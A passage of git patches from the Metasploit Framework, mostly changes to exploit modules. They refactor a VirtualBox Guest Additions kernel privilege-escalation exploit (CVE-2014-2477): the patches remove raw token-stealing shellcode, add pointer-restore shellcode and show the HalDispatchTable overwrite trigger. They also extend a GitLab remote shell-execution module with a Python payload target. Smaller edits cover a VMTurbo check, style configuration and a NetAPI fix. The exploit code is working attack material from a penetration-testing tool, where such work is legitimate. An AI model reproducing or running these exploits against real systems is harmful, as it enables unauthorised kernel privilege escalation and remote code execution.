Subject: [PATCH 291/321] There is only one target

---
 modules/exploits/windows/local/vbox_guest.rb | 16 +++++++---------
 1 file changed, 7 insertions(+), 9 deletions(-)

diff --git a/modules/exploits/windows/local/vbox_guest.rb b/modules/exploits/windows/local/vbox_guest.rb
index 384857ac6d..3e8614dfda 100644
--- a/modules/exploits/windows/local/vbox_guest.rb
+++ b/modules/exploits/windows/local/vbox_guest.rb
@@ -38,13 +38,12 @@ class Metasploit3 < Msf::Exploit::Local
         },
       'Targets'       =>
         [
-          [ 'Automatic', { } ],
-          [ 'Windows XP SP3', { } ],
+          [ 'Windows XP SP3', { } ]
         ],
       'References'    =>
         [
-          [ 'CVE', '2014-2477' ],
-          [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt' ]
+          ['CVE', '2014-2477'],
+          ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt']
         ],
       'DisclosureDate'=> 'Jul 15 2014',
       'DefaultTarget' => 0
@@ -108,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Local
     return nil
   end
 
-  def ring0_shellcode(t)
+  def ring0_shellcode
 
     tokenswap = "\x60\x64\xA1\x24\x01\x00\x00"
     tokenswap << "\x8B\x40\x44\x50\xBB\x04"
@@ -152,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Local
     return address
   end
 
-  def disclose_addresses(t)
+  def disclose_addresses
     addresses = {}
 
     vprint_status("Getting the Kernel module name...")
@@ -251,9 +250,8 @@ class Metasploit3 < Msf::Exploit::Local
       fail_with(Failure::NoTarget, "Unable to open \\\\.\\vboxguest device")
     end
 
-    my_target = targets[1]
     print_status("Disclosing the HalDispatchTable address...")
-    @addresses = disclose_addresses(my_target)
+    @addresses = disclose_addresses
     if @addresses.nil?
       session.railgun.kernel32.CloseHandle(handle)
       fail_with(Failure::Unknown, "Filed to disclose necessary address for exploitation. Aborting.")
@@ -263,7 +261,7 @@ class Metasploit3 < Msf::Exploit::Local
 
     print_status("Storing the shellcode in memory...")
     this_proc = session.sys.process.open
-    kernel_shell = ring0_shellcode(my_target)
+    kernel_shell = ring0_shellcode
     kernel_shell_address = 0x1
 
     buf = "\x90" * 0x6000

From f203fdebcbf35277ff9a4d93424cdbcca9623d6a Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 12 Aug 2014 17:09:39 -0500
Subject: [PATCH 292/321] Use Msf::Exploit::Local::WindowsKernel

---
 modules/exploits/windows/local/vbox_guest.rb | 161 ++++---------------
 1 file changed, 35 insertions(+), 126 deletions(-)

diff --git a/modules/exploits/windows/local/vbox_guest.rb b/modules/exploits/windows/local/vbox_guest.rb
index 3e8614dfda..6328a1cb4e 100644
--- a/modules/exploits/windows/local/vbox_guest.rb
+++ b/modules/exploits/windows/local/vbox_guest.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/local/windows_kernel'
 require 'rex'
 
 class Metasploit3 < Msf::Exploit::Local
   Rank = AverageRanking
 
+  include Msf::Exploit::Local::WindowsKernel
   include Msf::Post::File
   include Msf::Post::Windows::FileInfo
   include Msf::Post::Windows::Priv
@@ -38,7 +40,15 @@ class Metasploit3 < Msf::Exploit::Local
         },
       'Targets'       =>
         [
-          [ 'Windows XP SP3', { } ]
+          ['Windows XP SP3',
+            {
+              'HaliQuerySystemInfo' => 0x16bba,
+              '_KPROCESS'  => "\x44",
+              '_TOKEN'     => "\xc8",
+              '_UPID'      => "\x84",
+              '_APLINKS'   => "\x88"
+            }
+          ]
         ],
       'References'    =>
         [
@@ -51,86 +61,9 @@ class Metasploit3 < Msf::Exploit::Local
 
   end
 
-  def add_railgun_functions
-    session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
-    session.railgun.add_function(
-      'psapi',
-      'EnumDeviceDrivers',
-      'BOOL',
-      [
-        ["PBLOB", "lpImageBase", "out"],
-        ["DWORD", "cb", "in"],
-        ["PDWORD", "lpcbNeeded", "out"]
-      ])
-    session.railgun.add_function(
-      'psapi',
-      'GetDeviceDriverBaseNameA',
-      'DWORD',
-      [
-        ["LPVOID", "ImageBase", "in"],
-        ["PBLOB", "lpBaseName", "out"],
-        ["DWORD", "nSize", "in"]
-      ])
-  end
-
-  def open_device(dev)
-
-    invalid_handle_value = 0xFFFFFFFF
-
-    r = session.railgun.kernel32.CreateFileA(dev, "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
-
-    handle = r['return']
-
-    if handle == invalid_handle_value
-      return nil
-    end
-
-    return handle
-  end
-
-  def find_sys_base(drvname)
-    results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
-    addresses = results['lpImageBase'][0, results['lpcbNeeded']].unpack("V*")
-
-    addresses.each do |address|
-      results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
-      current_drvname = results['lpBaseName'][0, results['return']]
-      if drvname.nil?
-        if current_drvname.downcase.include?('krnl')
-          return [address, current_drvname]
-        end
-      elsif drvname == current_drvname
-        return [address, current_drvname]
-      end
-    end
-
-    return nil
-  end
-
-  def ring0_shellcode
-
-    tokenswap = "\x60\x64\xA1\x24\x01\x00\x00"
-    tokenswap << "\x8B\x40\x44\x50\xBB\x04"
-    tokenswap << "\x00\x00\x00\x8B\x80\x88"
-    tokenswap << "\x00\x00\x00\x2D\x88"
-    tokenswap << "\x00\x00\x00\x39\x98\x84"
-    tokenswap << "\x00\x00\x00\x75\xED\x8B\xB8\xC8"
-    tokenswap << "\x00\x00\x00\x83\xE7\xF8\x58\xBB"
-    tokenswap << "\x41\x41\x41\x41"
-    tokenswap << "\x8B\x80\x88\x00\x00\x00"
-    tokenswap << "\x2D\x88\x00\x00\x00"
-    tokenswap << "\x39\x98\x84\x00\x00\x00"
-    tokenswap << "\x75\xED\x89\xB8\xC8"
-    tokenswap << "\x00\x00\x00\x61\xC3"
-
-    tokenswap.sub!(/\x41\x41\x41\x41/, [session.sys.process.getpid].pack('V'))
-
-    return tokenswap
-  end
-
   def fill_memory(proc, address, length, content)
 
-    result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
+    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
 
     if not proc.memory.writable?(address)
       vprint_error("Failed to allocate memory")
@@ -151,49 +84,12 @@ class Metasploit3 < Msf::Exploit::Local
     return address
   end
 
-  def disclose_addresses
-    addresses = {}
-
-    vprint_status("Getting the Kernel module name...")
-    kernel_info = find_sys_base(nil)
-    if kernel_info.nil?
-      vprint_error("Failed to disclose the Kernel module name")
-      return nil
-    end
-    vprint_good("Kernel module found: #{kernel_info[1]}")
-
-    vprint_status("Getting a Kernel handle...")
-    kernel32_handle = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
-    kernel32_handle = kernel32_handle['return']
-    if kernel32_handle == 0
-      vprint_error("Failed to get a Kernel handle")
-      return nil
-    end
-    vprint_good("Kernel handle acquired")
-
-    vprint_status("Disclosing the HalDispatchTable...")
-    hal_dispatch_table = session.railgun.kernel32.GetProcAddress(kernel32_handle, "HalDispatchTable")
-    hal_dispatch_table = hal_dispatch_table['return']
-    if hal_dispatch_table == 0
-      vprint_error("Failed to disclose the HalDispatchTable")
-      return nil
-    end
-    hal_dispatch_table -= kernel32_handle
-    hal_dispatch_table += kernel_info[0]
-    addresses["halDispatchTable"] = hal_dispatch_table
-    vprint_good("HalDispatchTable found at 0x#{addresses["halDispatchTable"].to_s(16)}")
-
-    return addresses
-  end
-
   def check
-    add_railgun_functions
-
     if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
       return Exploit::CheckCode::Safe
     end
 
-    handle = open_device("\\\\.\\vboxguest")
+    handle = open_device('\\\\.\\vboxguest', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
     if handle.nil?
       return Exploit::CheckCode::Safe
     end
@@ -245,28 +141,41 @@ class Metasploit3 < Msf::Exploit::Local
       fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
     end
 
-    handle = open_device("\\\\.\\vboxguest")
+    handle = open_device('\\\\.\\vboxguest', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
     if handle.nil?
       fail_with(Failure::NoTarget, "Unable to open \\\\.\\vboxguest device")
     end
 
     print_status("Disclosing the HalDispatchTable address...")
-    @addresses = disclose_addresses
-    if @addresses.nil?
+    hal_dispatch_table = find_haldispatchtable
+    if hal_dispatch_table.nil?
       session.railgun.kernel32.CloseHandle(handle)
-      fail_with(Failure::Unknown, "Filed to disclose necessary address for exploitation. Aborting.")
+      fail_with(Failure::Unknown, "Filed to disclose HalDispatchTable")
     else
       print_good("Address successfully disclosed.")
     end
 
+    vprint_status('Getting the hal.dll base address...')
+    hal_info = find_sys_base('hal.dll')
+    fail_with(Failure::Unknown, 'Failed to disclose hal.dll base address') if hal_info.nil?
+
+    hal_base = hal_info[0]
+    vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16).rjust(8, '0')}")
+    hali_query_system_information = hal_base + target['HaliQuerySystemInfo']
+
     print_status("Storing the shellcode in memory...")
     this_proc = session.sys.process.open
-    kernel_shell = ring0_shellcode
+
+    restore_ptrs =  "\x31\xc0"                                         # xor eax, eax
+    restore_ptrs << "\xb8" + [hali_query_system_information].pack('V') # mov eax, offset hal!HaliQuerySystemInformation
+    restore_ptrs << "\xa3" + [hal_dispatch_table + 4].pack('V')        # mov dword ptr [nt!HalDispatchTable+0x4], eax
+
+    kernel_shell = token_stealing_shellcode(target)
     kernel_shell_address = 0x1
 
     buf = "\x90" * 0x6000
-    buf[0, 56] = "\x50\x00\x00\x00"*14
-    buf[0x5000, kernel_shell.length] = kernel_shell
+    buf[0, 56] = "\x50\x00\x00\x00" * 14
+    buf[0x5000, kernel_shell.length] = restore_ptrs + kernel_shell
 
     result = fill_memory(this_proc, kernel_shell_address, buf.length, buf)
     if result.nil?
@@ -277,11 +186,11 @@ class Metasploit3 < Msf::Exploit::Local
     end
 
     print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
-    ioctl = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a040, 0x1, 140, @addresses["halDispatchTable"] + 0x4 - 40, 0)
+    session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a040, 0x1, 140, hal_dispatch_table + 0x4 - 40, 0)
     session.railgun.kernel32.CloseHandle(handle)
 
     print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
-    result = session.railgun.ntdll.NtQueryIntervalProfile(2, 4)
+    session.railgun.ntdll.NtQueryIntervalProfile(2, 4)
 
     print_status("Checking privileges after exploitation...")
 

From 3eccc12f50a7e6fea4f19533cb5872bbe3ef1cb9 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 12 Aug 2014 17:11:24 -0500
Subject: [PATCH 293/321] Switch from vprint to print

---
 modules/exploits/windows/local/vbox_guest.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/local/vbox_guest.rb b/modules/exploits/windows/local/vbox_guest.rb
index 6328a1cb4e..9b1d058ae8 100644
--- a/modules/exploits/windows/local/vbox_guest.rb
+++ b/modules/exploits/windows/local/vbox_guest.rb
@@ -155,12 +155,12 @@ class Metasploit3 < Msf::Exploit::Local
       print_good("Address successfully disclosed.")
     end
 
-    vprint_status('Getting the hal.dll base address...')
+    print_status('Getting the hal.dll base address...')
     hal_info = find_sys_base('hal.dll')
     fail_with(Failure::Unknown, 'Failed to disclose hal.dll base address') if hal_info.nil?
 
     hal_base = hal_info[0]
-    vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16).rjust(8, '0')}")
+    print_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16).rjust(8, '0')}")
     hali_query_system_information = hal_base + target['HaliQuerySystemInfo']
 
     print_status("Storing the shellcode in memory...")

From da4b572a0d5fa11e13046629f93a4bf410e73eba Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 12 Aug 2014 17:17:26 -0500
Subject: [PATCH 294/321] Change module name

---
 .../{vbox_guest.rb => virtual_box_guest_additions.rb}    | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)
 rename modules/exploits/windows/local/{vbox_guest.rb => virtual_box_guest_additions.rb} (94%)

diff --git a/modules/exploits/windows/local/vbox_guest.rb b/modules/exploits/windows/local/virtual_box_guest_additions.rb
similarity index 94%
rename from modules/exploits/windows/local/vbox_guest.rb
rename to modules/exploits/windows/local/virtual_box_guest_additions.rb
index 9b1d058ae8..ab284ea9d8 100644
--- a/modules/exploits/windows/local/vbox_guest.rb
+++ b/modules/exploits/windows/local/virtual_box_guest_additions.rb
@@ -20,10 +20,11 @@ class Metasploit3 < Msf::Exploit::Local
     super(update_info(info, {
       'Name'          => 'VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation',
       'Description'    => %q{
-        A vulnerability within VBoxGuest module allows an attacker to inject memory they control
-        into an arbitrary location they define. This can be used by an attacker to overwrite
-        HalDispatchTable+0x4 and execute arbitrary code by subsequently calling
-        NtQueryIntervalProfile. This has been tested on VBoxGuest Additions up to 4.3.10r93012.
+        A vulnerability within the VBoxGuest driver allows an attacker to inject memory they
+        control into an arbitrary location they define. This can be used by an attacker to
+        overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling
+        NtQueryIntervalProfile on Windows XP SP3 systems. This has been tested with VBoxGuest
+        Additions up to 4.3.10r93012.
       },
       'License'       => MSF_LICENSE,
       'Author'        =>

From 4ff73a1467bc98c39c403f52f3020d150cd1b199 Mon Sep 17 00:00:00 2001
From: Emilio Pinna <emilio.pinn@gmail.com>
Date: Wed, 13 Aug 2014 09:53:43 +0200
Subject: [PATCH 295/321] Add version build check

---
 modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
index 8779712082..8441d959fd 100644
--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
       return Exploit::CheckCode::Unknown
     end
 
-    if version and version <= "4.6"
+    if version and version <= "4.6" and build < "28657"
       return Exploit::CheckCode::Appears
     else
       return Exploit::CheckCode::Safe

From 4a01c27ed4b2206606cb9476092b138ae5530f31 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 13 Aug 2014 10:59:22 +0100
Subject: [PATCH 296/321] Use get_env and good pack specifier

---
 modules/exploits/windows/local/virtual_box_guest_additions.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/local/virtual_box_guest_additions.rb b/modules/exploits/windows/local/virtual_box_guest_additions.rb
index ab284ea9d8..6570ae6a59 100644
--- a/modules/exploits/windows/local/virtual_box_guest_additions.rb
+++ b/modules/exploits/windows/local/virtual_box_guest_additions.rb
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Local
 
   def fill_memory(proc, address, length, content)
 
-    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
+    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
 
     if not proc.memory.writable?(address)
       vprint_error("Failed to allocate memory")
@@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Local
       return Exploit::CheckCode::Safe
     end
 
-    file_path = expand_path("%windir%") << "\\system32\\drivers\\vboxguest.sys"
+    file_path = get_env('WINDIR') << "\\system32\\drivers\\vboxguest.sys"
     unless file?(file_path)
       return Exploit::CheckCode::Unknown
     end

From 256204f2afbbbc0ea7709852cd18d901fa7fb690 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 13 Aug 2014 11:36:16 +0100
Subject: [PATCH 297/321] Use correct pack/unpack specifier

---
 lib/msf/core/exploit/local/windows_kernel.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/local/windows_kernel.rb b/lib/msf/core/exploit/local/windows_kernel.rb
index 5346946254..48a2939b7b 100644
--- a/lib/msf/core/exploit/local/windows_kernel.rb
+++ b/lib/msf/core/exploit/local/windows_kernel.rb
@@ -49,7 +49,7 @@ module Exploit::Local::WindowsKernel
   #
   def find_sys_base(drvname)
     if session.railgun.util.pointer_size == 8
-      ptr = '<Q'
+      ptr = 'Q<'
     else
       ptr = 'V'
     end

From 05a198bc96047fcbd030d66fb731398d28607dd6 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 13 Aug 2014 14:06:25 +0100
Subject: [PATCH 298/321] Correct spelling

---
 modules/exploits/windows/local/virtual_box_guest_additions.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/local/virtual_box_guest_additions.rb b/modules/exploits/windows/local/virtual_box_guest_additions.rb
index 6570ae6a59..35870631d7 100644
--- a/modules/exploits/windows/local/virtual_box_guest_additions.rb
+++ b/modules/exploits/windows/local/virtual_box_guest_additions.rb
@@ -151,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Local
     hal_dispatch_table = find_haldispatchtable
     if hal_dispatch_table.nil?
       session.railgun.kernel32.CloseHandle(handle)
-      fail_with(Failure::Unknown, "Filed to disclose HalDispatchTable")
+      fail_with(Failure::Unknown, "Failed to disclose HalDispatchTable")
     else
       print_good("Address successfully disclosed.")
     end

From 127d094a8d7f78657c60b6d88ce9d9e1427676f2 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 13 Aug 2014 16:13:38 -0500
Subject: [PATCH 299/321] Dont share once device is opened

---
 modules/exploits/windows/local/virtual_box_opengl_escape.rb | 4 +---
 1 file changed, 1 insertion(+), 3 deletions(-)

diff --git a/modules/exploits/windows/local/virtual_box_opengl_escape.rb b/modules/exploits/windows/local/virtual_box_opengl_escape.rb
index 3714a27e83..b839049eda 100644
--- a/modules/exploits/windows/local/virtual_box_opengl_escape.rb
+++ b/modules/exploits/windows/local/virtual_box_opengl_escape.rb
@@ -11,8 +11,6 @@ class Metasploit3 < Msf::Exploit::Local
 
   DEVICE               = '\\\\.\\VBoxGuest'
   INVALID_HANDLE_VALUE = 0xFFFFFFFF
-  FILE_SHARE_READ      = 0x00000001
-  FILE_SHARE_WRITE     = 0x00000002
 
   # VBOX HGCM protocol constants
   VBOXGUEST_IOCTL_HGCM_CONNECT    = 2269248
@@ -88,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def open_device
-    r = session.railgun.kernel32.CreateFileA(DEVICE, "GENERIC_READ | GENERIC_WRITE", FILE_SHARE_READ | FILE_SHARE_WRITE, nil, "OPEN_EXISTING", "FILE_ATTRIBUTE_NORMAL", 0)
+    r = session.railgun.kernel32.CreateFileA(DEVICE, "GENERIC_READ | GENERIC_WRITE", 0, nil, "OPEN_EXISTING", "FILE_ATTRIBUTE_NORMAL", 0)
 
     handle = r['return']
 

From 5ed3e6005ab879af1ad60c42f63d6260471258bb Mon Sep 17 00:00:00 2001
From: kaospunk <github@bmkdirect.com>
Date: Wed, 13 Aug 2014 20:26:48 -0400
Subject: [PATCH 300/321] Implement suggestions

This commit addresses feedback such as adding a check
function and changing the login fail case by being
more specific on what is checked for. The failing
ARCH_CMD payloads were addressed by adding BadChars.
Last, an ARCH_PYTHON target was added based on
@zerosteiner's feedback.
---
 .../exploits/multi/http/gitlab_shell_exec.rb  | 35 ++++++++++++++-----
 1 file changed, 27 insertions(+), 8 deletions(-)

diff --git a/modules/exploits/multi/http/gitlab_shell_exec.rb b/modules/exploits/multi/http/gitlab_shell_exec.rb
index ecbf41dfbe..c4166b5f2d 100644
--- a/modules/exploits/multi/http/gitlab_shell_exec.rb
+++ b/modules/exploits/multi/http/gitlab_shell_exec.rb
@@ -50,10 +50,16 @@ class Metasploit3 < Msf::Exploit::Remote
             'Payload' =>
                 {
                   'Compat'      => {
-                    'RequiredCmd' => 'perl python ruby openssl netcat'
-                  }
+                    'RequiredCmd' => 'openssl perl python'
+                  },
+                  'BadChars' => "\x22"
                 }
 
+          }],
+          ['Python', {
+            'Platform' => 'python',
+            'Arch' => ARCH_PYTHON,
+            'Payload' => { 'BadChars' => "\x22" }
           }]
         ],
       'CmdStagerFlavor' => %w( bourne printf ),
@@ -70,9 +76,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def exploit
     login
-    if target.name == 'Unix (CMD)'
+    case target['Platform']
+    when 'unix'
       execute_command(payload.encoded)
-    else
+    when 'python'
+      execute_command("python -c \\\"#{payload.encoded}\\\"")
+    when 'linux'
       execute_cmdstager(temp: './', linemax: 2800)
     end
   end
@@ -82,10 +91,20 @@ class Metasploit3 < Msf::Exploit::Remote
     delete_key(key_id)
   end
 
+  def check
+    res = send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'users', 'sign_in'))
+    if res && res.body.include?('GitLab')
+      return Exploit::CheckCode::Detected
+    else
+      vprint_error("#{peer} - Connection timed out")
+      return Exploit::CheckCode::Unknown
+    end
+  end
+
   def login
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
-    signin_page = normalize_uri(datastore['TARGETURI'], 'users', 'sign_in')
+    signin_page = normalize_uri(target_uri.path.to_s, 'users', 'sign_in')
 
     # Get a valid session cookie and authenticity_token for the next step
     res = send_request_cgi(
@@ -122,16 +141,16 @@ class Metasploit3 < Msf::Exploit::Remote
                               }
                           )
 
-    fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res
+    fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res && res.code == 302
 
     @session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]
   end
 
   def add_key(cmd)
     if @gitlab_version == 5
-      @key_base = normalize_uri(datastore['TARGETURI'], 'keys')
+      @key_base = normalize_uri(target_uri.path.to_s, 'keys')
     else
-      @key_base = normalize_uri(datastore['TARGETURI'], 'profile', 'keys')
+      @key_base = normalize_uri(target_uri.path.to_s, 'profile', 'keys')
     end
 
     # Perform an initial request to get an authenticity_token so the actual

From fbb8262704154492b38c8bd05a69cf7d4c9e404d Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Thu, 14 Aug 2014 11:17:14 -0500
Subject: [PATCH 301/321] More .rubocop.yml exceptions

While we expect to remove Rubocop via PR rapid7#3639 , the Rubocop YAML
file is still useful for those developers that want to use Rubocop on
their own. Like me, for instance.
---
 .rubocop.yml | 30 ++++++++++++++----------------
 1 file changed, 14 insertions(+), 16 deletions(-)

diff --git a/.rubocop.yml b/.rubocop.yml
index 5ab3b803db..bbe4e49912 100644
--- a/.rubocop.yml
+++ b/.rubocop.yml
@@ -1,11 +1,12 @@
-# This list was created by analyzing the last three months (51 modules)
-# committed to Metasploit Framework. Many, many older modules will have
-# offenses, but this should at least provide a baseline for new modules.
+# This list was intially created by analyzing the last three months (51
+# modules) committed to Metasploit Framework. Many, many older modules
+# will have offenses, but this should at least provide a baseline for
+# new modules.
 #
-# Updates to this file should include a 'Description' parameter for
-# any explaination needed.
+# Updates to this file should include a 'Description' parameter for any
+# explaination needed.
 
-inherit_from: .rubocop_todo.yml
+# inherit_from: .rubocop_todo.yml
 
 Style/ClassLength:
   Description: 'Most Metasploit modules are quite large. This is ok.'
@@ -42,17 +43,14 @@ Style/NumericLiterals:
   Enabled: false
   Description: 'This often hurts readability for exploit-ish code.'
 
-Style/PercentLiteralDelimiters:
+Style/SpaceInsideBrackets:
   Enabled: false
-  Description: >-
-                  Metasploit devs tend to prefer [] over %w() for
-                  nearly all cases, since we often deal with funny
-                  looking arrays of nonwords. Consistency here is
-                  preferred over element type safety.
+  Description: 'Until module template are final, most modules will fail this.'
+
+Style/StringLiterals:
+  Enabled: false
+  Description: 'Single vs double quote fights are largely unproductive.'
 
 Style/WordArray:
   Enabled: false
-  Description: >-
-                  Metasploit devs have grown comforatble with curly
-                  braces over parens for %w. Disabling this check
-                  prefers consistency.
+  Description: 'Metasploit prefers consistent use of []'

From ee968db9eff9826b0a9777a8205a9da6c81b5004 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Thu, 14 Aug 2014 11:20:19 -0500
Subject: [PATCH 302/321] Include .rubocop.yml from PR #3649

---
 .rubocop.yml | 56 ++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 56 insertions(+)
 create mode 100644 .rubocop.yml

diff --git a/.rubocop.yml b/.rubocop.yml
new file mode 100644
index 0000000000..bbe4e49912
--- /dev/null
+++ b/.rubocop.yml
@@ -0,0 +1,56 @@
+# This list was intially created by analyzing the last three months (51
+# modules) committed to Metasploit Framework. Many, many older modules
+# will have offenses, but this should at least provide a baseline for
+# new modules.
+#
+# Updates to this file should include a 'Description' parameter for any
+# explaination needed.
+
+# inherit_from: .rubocop_todo.yml
+
+Style/ClassLength:
+  Description: 'Most Metasploit modules are quite large. This is ok.'
+  Enabled: true
+  Exclude:
+    - 'modules/**/*'
+
+Style/Documentation:
+  Enabled: true
+  Description: 'Most Metasploit modules do not have class documentation.'
+  Exclude:
+    - 'modules/**/*'
+
+Style/Encoding:
+  Enabled: true
+  Description: 'We prefer binary to UTF-8.'
+  EnforcedStyle: 'when_needed'
+
+Style/LineLength:
+  Description: >-
+                  Metasploit modules often pattern match against very
+                  long strings when identifying targets.
+  Enabled: true
+  Max: 180
+
+Style/MethodLength:
+  Enabled: true
+  Description: >-
+                  While the style guide suggests 10 lines, exploit definitions
+                  often exceed 200 lines.
+  Max: 300
+
+Style/NumericLiterals:
+  Enabled: false
+  Description: 'This often hurts readability for exploit-ish code.'
+
+Style/SpaceInsideBrackets:
+  Enabled: false
+  Description: 'Until module template are final, most modules will fail this.'
+
+Style/StringLiterals:
+  Enabled: false
+  Description: 'Single vs double quote fights are largely unproductive.'
+
+Style/WordArray:
+  Enabled: false
+  Description: 'Metasploit prefers consistent use of []'

From a80d4c25a607029c35cd9fcf0c446df248ef9122 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Thu, 14 Aug 2014 11:51:44 -0500
Subject: [PATCH 303/321] Be more forceful about Rubocop in CONTRIBUTING.md

---
 CONTRIBUTING.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index 6de7c3cf36..ec572a60b9 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -33,7 +33,7 @@ and Metasploit's [Common Coding Mistakes](https://github.com/rapid7/metasploit-f
 ## Code Contributions
 
 * **Do** stick to the [Ruby style guide](https://github.com/bbatsov/ruby-style-guide).
-* Similarly, **try** to get Rubocop passing or at least relatively quiet against the files added/modified as part of your contribution
+* *Do* get [Rubocop](https://rubygems.org/search?query=rubocop) relatively quiet against the code you are adding or modifying.
 * **Do** follow the [50/72 rule](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html) for Git commit messages.
 * **Do** create a [topic branch](http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches) to work on instead of working directly on `master`.
 

From 8302e82ca109bbfd585ec5a8f3eca8ab95fc4510 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Thu, 14 Aug 2014 23:32:04 +0100
Subject: [PATCH 304/321] Use x64 ptr sizes

---
 lib/msf/core/post/windows/netapi.rb | 47 ++++++++++++++++++-----------
 1 file changed, 29 insertions(+), 18 deletions(-)

diff --git a/lib/msf/core/post/windows/netapi.rb b/lib/msf/core/post/windows/netapi.rb
index 4526c184d6..4ece2a443e 100644
--- a/lib/msf/core/post/windows/netapi.rb
+++ b/lib/msf/core/post/windows/netapi.rb
@@ -50,7 +50,10 @@ module NetAPI
 
     case result['return']
     when 0
-      hosts = read_server_structs(result['bufptr'], result['totalentries'], domain, server_type)
+      # Railgun assumes PDWORDS are pointers and returns 8 bytes for x64 architectures.
+      # Therefore we need to truncate the result value to an actual
+      # DWORD for entriesread or totalentries.
+      hosts = read_server_structs(result['bufptr'], (result['entriesread'] % 4294967296), domain, server_type)
     when ERROR_NO_BROWSER_SERVERS_FOUND
       print_error("ERROR_NO_BROWSER_SERVERS_FOUND")
       return nil
@@ -65,26 +68,28 @@ module NetAPI
   end
 
   def read_server_structs(start_ptr, count, domain, server_type)
-    base = 0
-    struct_size = 8
     hosts = []
+    return hosts if count <= 0
 
-    if count == 0
-      return hosts
-    end
+    ptr_size = client.railgun.util.pointer_size
+    ptr = (ptr_size == 8) ? 'Q<' : 'V'
+
+    base = 0
